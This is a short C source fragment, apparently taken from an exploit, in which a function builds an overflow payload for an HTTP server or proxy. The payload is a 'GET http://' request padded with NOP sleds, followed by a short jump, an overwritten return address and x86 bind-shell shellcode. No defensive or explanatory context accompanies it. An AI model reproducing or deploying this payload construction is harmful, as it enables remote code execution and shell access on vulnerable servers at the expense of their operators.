
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int BUFSIZE ;
 scalar_t__ malloc (int) ;
 int memcpy (char*,char*,int) ;
 int memset (char*,char,int) ;
 int printe (char*,int) ;
 int strlen (char*) ;
 char* x86_bind ;

char *getbuf(unsigned int addr){
 char *buf;
 if(!(buf=(char *)malloc(BUFSIZE+1)))
  printe("getbuf(): allocating memory failed.",1);
 memset(buf,0,BUFSIZE);
 memcpy(buf,"GET http://",11);
 memset(buf+11,'\x90',250);
 buf[11+250]=0xeb;
 buf[11+250+1]=0x04;
 *(long *)&buf[11+250+2]=addr;
 memset(buf+11+250+4+2,'\x90',32);
 memcpy(buf+11+250+4+2+32,x86_bind,strlen(x86_bind));
 memset(buf+11+250+4+2+32+strlen(x86_bind),'/',1);
 memset(buf+11+250+4+2+32+strlen(x86_bind)+1,'\n',2);
 return(buf);
}
